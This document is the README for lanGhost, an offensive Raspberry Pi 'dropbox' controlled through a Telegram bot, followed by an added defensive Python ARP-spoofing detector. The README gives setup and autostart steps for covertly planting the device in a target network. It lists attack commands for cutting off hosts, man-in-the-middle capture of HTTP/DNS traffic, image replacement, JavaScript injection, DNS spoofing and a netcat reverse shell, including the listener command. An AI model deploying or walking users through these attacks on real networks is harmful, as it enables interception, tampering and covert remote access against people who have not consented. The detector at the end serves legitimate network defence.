lanGhost is designed for the Raspberry Pi (Raspbian / Kali for RPi). Running it on other/desktop distributions may cause problems, and it may not work properly.
You will need a Raspberry Pi with a fresh Raspbian/Kali on the SD card, because you don't want anything else running in the background.
Boot up the Pi, get an SSH session or connect a display and keyboard, then enter the following commands:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
Please read the questions/messages while running the setup script!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Using lanGhost on networks larger than /24 is not recommended, because scanning will take too long.
lanGhost is not quiet. Anyone monitoring the traffic can see the ARP packets!
If you chose yes in step 4/4 (autostart), the Pi is fully set up to be dropped. lanGhost should start on boot and send you a message on Telegram containing the text: lanGhost started!
Be sure to try it out in your lab first and test that lanGhost responds to your messages!
If everything is ready, just plug an Ethernet cable into the Pi and power it over micro USB to connect it to the target network, and you're good to go!
(lanGhost also works over WiFi, but you need to set up wpa_supplicant first so that it connects to the network automatically.)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
You can start an attack with one of the following commands: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
Once you have started one or more attacks, you can use the /attacks command to get a list of attacks with their ATTACK-IDs.
To stop an attack, use /stop [ATTACK-ID].
/reversesh only creates an unencrypted netcat TCP connection, and all of its traffic can be monitored! Use it only for emergency fixes, or set up an encrypted reverse connection if you need one.
The /reversesh command is for getting a reverse shell on the Pi when it cannot be reached from outside.
To use the /reversesh command, you need a server listening for the shell.
Netcat command to start the listener on your server:
$ nc -l 0.0.0.0 [PORT]
Telegram command:
/reversesh [IP-of-your-listening-server] [PORT]
/kill - Stop the target's network connection.
/mitm - Capture HTTP and DNS traffic from the target and send it to you as text messages.
/replaceimg - Replace the target's HTTP images with a picture you send to the bot.
/injectjs - Inject JavaScript into every HTTP HTML response for the target. You need to host the JS file on a server and pass its URL as the parameter.
/spoofdns - Spoof DNS responses for the target.
All attacks use ARP spoofing!
/scan - Scan the local network and return the hosts that are online. Uses an nmap -sn scan to discover hosts.
/scanip - Scan an IP address for open ports and other information. Uses an nmap -sS scan.
You will receive a message every time a new device joins or leaves the network.
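The note that every attack relies on ARP spoofing is also what makes a dropped Pi visible to anyone watching the LAN. As an added example (not part of lanGhost), here is a small Python detector that flags the two symptoms a network monitor would see: an IP address whose MAC flips between senders, and one MAC answering for several IPs. The record format and the sample ARP replies are constructed for illustration.

```python
"""Detect ARP spoofing from a list of observed ARP replies.
Added example, not lanGhost code; the record format and sample packets
below are constructed for illustration."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Each record: (timestamp_seconds, sender_ip, sender_mac) taken from an ARP
# "is-at" reply. A legitimate host answers with a single MAC for its IP; a
# spoofing device answers for the gateway AND the victim with its own MAC,
# so one MAC shows up behind several IPs and an IP's MAC flips between
# the real owner and the spoofer.
ArpReply = Tuple[float, str, str]

def detect_arp_spoofing(replies: List[ArpReply],
                        min_ips_per_mac: int = 2) -> Dict[str, List[str]]:
    """Return {"ip_mac_flips": [...], "mac_claims_many_ips": [...]}."""
    last_mac_for_ip: Dict[str, str] = {}
    ips_for_mac: Dict[str, Set[str]] = defaultdict(set)
    findings: Dict[str, List[str]] = {"ip_mac_flips": [], "mac_claims_many_ips": []}
    for ts, ip, mac in replies:
        mac = mac.lower()
        ips_for_mac[mac].add(ip)
        prev = last_mac_for_ip.get(ip)
        if prev is not None and prev != mac:
            findings["ip_mac_flips"].append(f"{ts:.0f}s: {ip} moved from {prev} to {mac}")
        last_mac_for_ip[ip] = mac
    for mac, ips in sorted(ips_for_mac.items()):
        if len(ips) >= min_ips_per_mac:
            findings["mac_claims_many_ips"].append(f"{mac} claims {sorted(ips)}")
    return findings

# Constructed sample: gateway .1 and host .42 are legitimate; a spoofing
# device starts answering for both at t=10 (b8:27:eb is a real Raspberry Pi
# OUI prefix, the rest of the address is made up).
SAMPLE_REPLIES: List[ArpReply] = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (1.0, "192.168.1.42", "aa:bb:cc:00:00:42"),
    (5.0, "192.168.1.7", "aa:bb:cc:00:00:07"),
    (10.0, "192.168.1.1", "b8:27:eb:11:22:33"),
    (10.1, "192.168.1.42", "b8:27:eb:11:22:33"),
    (12.0, "192.168.1.1", "aa:bb:cc:00:00:01"),  # real gateway answers again
    (12.5, "192.168.1.1", "b8:27:eb:11:22:33"),  # spoofer re-poisons the entry
]

if __name__ == "__main__":
    for kind, items in detect_arp_spoofing(SAMPLE_REPLIES).items():
        print(kind, *items, sep="\n  ")
```

On a real network the records would come from a packet capture or a switch's ARP inspection log; a gateway whose MAC flips is the strongest signal, since the gateway is what every lanGhost attack has to impersonate.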
Copyright (c) 2018 by David Schütz. Some rights reserved.
lanGhost is licensed under the MIT License, following all the directions given in the license file. You can also reach the author by e-mail at xdavid{at}protonmail{dot}com.